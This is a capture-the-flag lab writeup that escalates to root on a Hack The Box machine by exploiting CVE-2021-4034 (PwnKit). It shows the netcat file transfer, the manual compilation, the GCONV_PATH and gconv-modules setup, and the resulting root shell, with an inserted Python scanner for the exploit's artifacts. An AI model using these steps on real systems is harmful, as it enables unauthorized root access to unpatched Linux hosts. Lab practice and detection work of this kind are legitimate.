CVE-2021-4034


PEAS discovered that the target system is vulnerable to CVE-2021-4034.

The vulnerable program is part of Polkit, which manages process privileges. Polkit's pkexec lets non-privileged processes communicate with privileged ones and mediates legitimate, authorized uses of privilege escalation, similar to sudo.

A memory corruption flaw exists when pkexec is invoked with no arguments. By manipulating environment variables, an attacker can trick pkexec into loading and executing arbitrary code with superuser privileges.

Exploit (PwnKit)


I found an exploit online.

Exploitation


┌──(kali㉿kali)-[~/archive/htb/labs/ophiuchi]
└─$ nc $IP 2222 < CVE-2021-4034.tar.gz
 
tomcat@ophiuchi:/dev/shm$ nc -nlvp 2222 > CVE-2021-4034.tar.gz
Listening on 0.0.0.0 2222
Connection received on 10.10.14.10 44088
 
tomcat@ophiuchi:/dev/shm$ tar -xf CVE-2021-4034.tar.gz ; cd CVE-2021-4034

Delivery complete.

tomcat@ophiuchi:/dev/shm/CVE-2021-4034$ make
 
command 'make' not found, but can be installed with:
 
apt install make        # version 4.2.1-1.2, or
apt install make-guile  # version 4.2.1-1.2
 
Ask your administrator to install one of them.

make is not available on the target system.

tomcat@ophiuchi:/dev/shm/CVE-2021-4034$ gcc
gcc: fatal error: no input files
compilation terminated.
tomcat@ophiuchi:/dev/shm/CVE-2021-4034$ cc
cc: fatal error: no input files
compilation terminated.

However, gcc and cc are installed and available, so I can compile the exploit manually.

tomcat@ophiuchi:/dev/shm/CVE-2021-4034$ cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
tomcat@ophiuchi:/dev/shm/CVE-2021-4034$ cc -Wall cve-2021-4034.c -o cve-2021-4034
tomcat@ophiuchi:/dev/shm/CVE-2021-4034$ echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
tomcat@ophiuchi:/dev/shm/CVE-2021-4034$ mkdir -p GCONV_PATH=.
tomcat@ophiuchi:/dev/shm/CVE-2021-4034$ cp -f /usr/bin/true GCONV_PATH=./pwnkit.so:.
tomcat@ophiuchi:/dev/shm/CVE-2021-4034$ ll
total 68K
   0 drwxr-x--- 2 tomcat tomcat   60 mar 29 17:45 'GCONV_PATH=.'
   0 drwxr-x--- 5 tomcat tomcat  300 mar 29 17:45  .
4.0k -rw-r----- 1 tomcat tomcat   33 mar 29 17:45  gconv-modules
 20k -rwxr-x--- 1 tomcat tomcat  17k mar 29 17:45  cve-2021-4034
 16k -rwxr-x--- 1 tomcat tomcat  16k mar 29 17:45  pwnkit.so
   0 drwxrwxrwt 3 root   root     80 mar 29 17:45  ..
4.0k -rw-r----- 1 tomcat tomcat  292 mar 29 17:40  cve-2021-4034.c
4.0k -rwxr-x--- 1 tomcat tomcat  305 mar 29 17:40  cve-2021-4034.sh
   0 drwxr-x--- 2 tomcat tomcat  100 mar 29 17:40  dry-run
   0 drwxr-x--- 8 tomcat tomcat  260 mar 29 17:40  .git
4.0k -rw-r----- 1 tomcat tomcat  114 mar 29 17:40  .gitignore
4.0k -rw-r----- 1 tomcat tomcat 1.1k mar 29 17:40  LICENSE
4.0k -rw-r----- 1 tomcat tomcat  469 mar 29 17:40  Makefile
4.0k -rw-r----- 1 tomcat tomcat  339 mar 29 17:40  pwnkit.c
4.0k -rw-r----- 1 tomcat tomcat 3.4k mar 29 17:40  README.md

Looks all good.
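The listing above is also what a responder would sweep temp directories for after the fact: a directory literally named GCONV_PATH=. and a gconv-modules file registering a converter that glibc does not ship. The following scanner is an added detection example, not code from this writeup or from the exploit repository; the /usr/bin/pkexec location and the directory passed to the scanner are assumptions, and the sample tree it builds is constructed here to mirror the listing.

```python
import os
import re
import stat
import tempfile

# Indicators taken from the exploit's setup steps shown in the listing above.
GCONV_DIR_RE = re.compile(r"^GCONV_PATH=")                              # e.g. 'GCONV_PATH=.'
GCONV_MODULE_RE = re.compile(r"^\s*module\s+\S+\s+\S+\s+(\S+)", re.M)   # module FROM TO NAME COST

def scan_for_pwnkit_artifacts(root):
    """Walk `root` (e.g. /dev/shm or /tmp) and return (path, reason) findings:
    directories whose name is a literal GCONV_PATH= assignment, and any
    gconv-modules file outside glibc's own gconv directory, with the
    converter names it registers."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for d in dirnames:
            if GCONV_DIR_RE.match(d):
                findings.append((os.path.join(dirpath, d),
                                 "directory named like a GCONV_PATH= assignment"))
        if "gconv-modules" in filenames:
            path = os.path.join(dirpath, "gconv-modules")
            try:
                with open(path, errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue  # unreadable file: skip rather than abort the sweep
            for m in GCONV_MODULE_RE.finditer(text):
                findings.append((path, f"registers gconv converter {m.group(1)!r}"))
    return findings

def pkexec_is_setuid(path="/usr/bin/pkexec"):
    """True if pkexec exists and carries the setuid bit the flaw relies on (path is an assumption)."""
    try:
        mode = os.stat(path).st_mode
    except FileNotFoundError:
        return False
    return bool(mode & stat.S_ISUID)

def build_sample_tree():
    """Constructed sample: recreate the artifact layout from the listing above
    in a temporary directory so the scanner can be exercised offline."""
    root = tempfile.mkdtemp(prefix="pwnkit-sample-")
    os.mkdir(os.path.join(root, "GCONV_PATH=."))
    with open(os.path.join(root, "gconv-modules"), "w") as fh:
        fh.write("module UTF-8// PWNKIT// pwnkit 1\n")
    return root
```

Running `scan_for_pwnkit_artifacts(build_sample_tree())` reports both the directory and the `pwnkit` converter registration; a legitimate system gconv-modules lives under glibc's gconv directory, so only copies found in temp or home locations are worth alerting on.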

tomcat@ophiuchi:/dev/shm/CVE-2021-4034$ ./cve-2021-4034
./cve-2021-4034
# whoami
whoami
root
# hostname
hostname
ophiuchi
# ifconfig
ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.10.227  netmask 255.255.255.0  broadcast 10.10.10.255
        inet6 dead:beef::250:56ff:feb9:3d0d  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::250:56ff:feb9:3d0d  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b9:3d:0d  txqueuelen 1000  (Ethernet)
        RX packets 25214  bytes 5938624 (5.9 MB)
        RX errors 0  dropped 150  overruns 0  frame 0
        TX packets 7805  bytes 12728202 (12.7 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 62802  bytes 4471178 (4.4 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 62802  bytes 4471178 (4.4 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

System Level Compromise